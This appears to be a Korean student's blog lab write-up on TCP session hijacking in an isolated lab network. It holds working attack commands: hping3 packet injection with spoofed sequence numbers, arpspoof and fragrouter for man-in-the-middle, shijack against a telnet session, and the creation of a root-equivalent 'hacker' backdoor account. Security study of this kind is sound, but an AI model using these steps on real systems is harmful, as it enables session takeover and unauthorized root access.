kjh00n의 기록저장소

TCP Session Hijacking 실습 본문

네트워크 보안 운영

TCP Session Hijacking 실습

kjh00n 2024. 12. 12. 11:29

Server (Rocky) - 192.168.50.50

Client (Rocky) - 192.168.50.100

Kali Linux - 192.168.50.200


Server

nc -l 9000 (9000번 Port를 열겠다)

Client 

nc 192.168.50.50 9000

Client에서 hello를 입력하면 Server쪽에도 자동으로 출력되고 Server에서 hello라고 입력하면 Client도 출력된다.

3way handshake하고 hello라고 입력한 데이터가 표시된다

hping3 -a <출발지 IP> -s <출발 포트> -p <목적지 포트> -M <Sequence 번호> -L <Acknowledgment 번호> -E <파일 경로> -d <전송할 파일 크기> -P -A -c <전송 횟수> <목적지 IP>

 

Kali Linux

파일 하나 만들어주기

(다시 새로 접속해서 Port랑 번호들이 다 바뀜)

hping3 -a 192.168.50.100 -s 57396 -p 9000 -M 3472942298 -L 2540105380 -E /root/data.txt -d 10 -P -A -c 1 192.168.50.50

Kali Linux
Server

Kali Linux가 TCP Session Hijacking을 했기에 Server와 Client는 연결이 끊긴 상태임

그래서 Kali Linux에 있는 data.txt의 내용인 hello1이 Server에 출력되고 Client에서 아무리 데이터를 입력해도 Server에는 전달되지 않음

TCP Session Hijacking이 된 상태

Client와 Server가 연결이 안되서 다시 보내달라고 계속 요청중


Tool을 사용한 공격

바탕화면인 Desktop으로 이동하고 압축을 풀어준다.

그러고 나서 압축을 풀고나서 나온 폴더로 이동

Client를 공격하는데 Server인척한다
client
Server를 공격하는데 Client인척한다
server
Software Forwarding
Client에서 telnet Server로 접속
위 명령어 치기 전에 fragrouter -B1 종료하기

./shijack-lnx eth0 192.168.50.100 49960 192.168.50.50 23

49960은 client인 50.100의 port주소

23은 telnet server의 port주소

[해커인 50.200이 50.100인척 속여서 50.50을 접속하겠다~]

종료하고 치고난 후에 touch hello 입력
Server에 hello가 생김

당연히 Client는 연결이 끊겼기에 아무런 입력도 불가능

계정을 hacker라는 계정을 만들고 hacker의 UID를 0으로 강제로 바꾼다

-o가 강제로 바꾼다는 뜻 / 0은 root와 같은 UID이다.

만들고 종료한 다음 telnet으로 접속하기

telnet으로 192.168.50.50에 hacker라는 계정으로 접속했는데 UID가 0이라서 root로 표시된다.

Telnet Server Linux에는 hacker라는 계정이 생성되어있다.


공격 순서

1. server -> telnet-server 구축 및 실행

2. client -> telnet-client 설치

3. kali -> arpspoofing 공격

(arpspoof -i eth0 -t 192.168.50.50 192.168.50.100)

(arpspoof -i eth0 -t 192.168.50.100 192.168.50.50)

(fragrouter -B1)

4.client -> telnet 접속 및 로그인하고 원격서비스 진행

5.kali -> fragrouter 종료 -> forwarding 기능 종료

6.kali -> ./shijack-lnx eth0 192.168.50.100 client포트(fragrouter한 터미널에서 보임) 192.168.50.50 서버포트23

7.client가 명령어 입력하면 입력안됨 -> kali에서는 sequence 번호와 acknowledge 번호를 습득

8.kali가 습득한 번호와 주소를 이용하여 hijacking 성공

'네트워크 보안 운영' 카테고리의 다른 글

DNS Spoofing 실습  (0) 2024.12.12
DNS Attack  (0) 2024.12.12
TCP Session Hijacking  (0) 2024.12.12
ICMP Spoofing(ICMP Redirect) 및 간단한 실습  (0) 2024.12.11
IP Spoofing 간단 실습  (0) 2024.12.11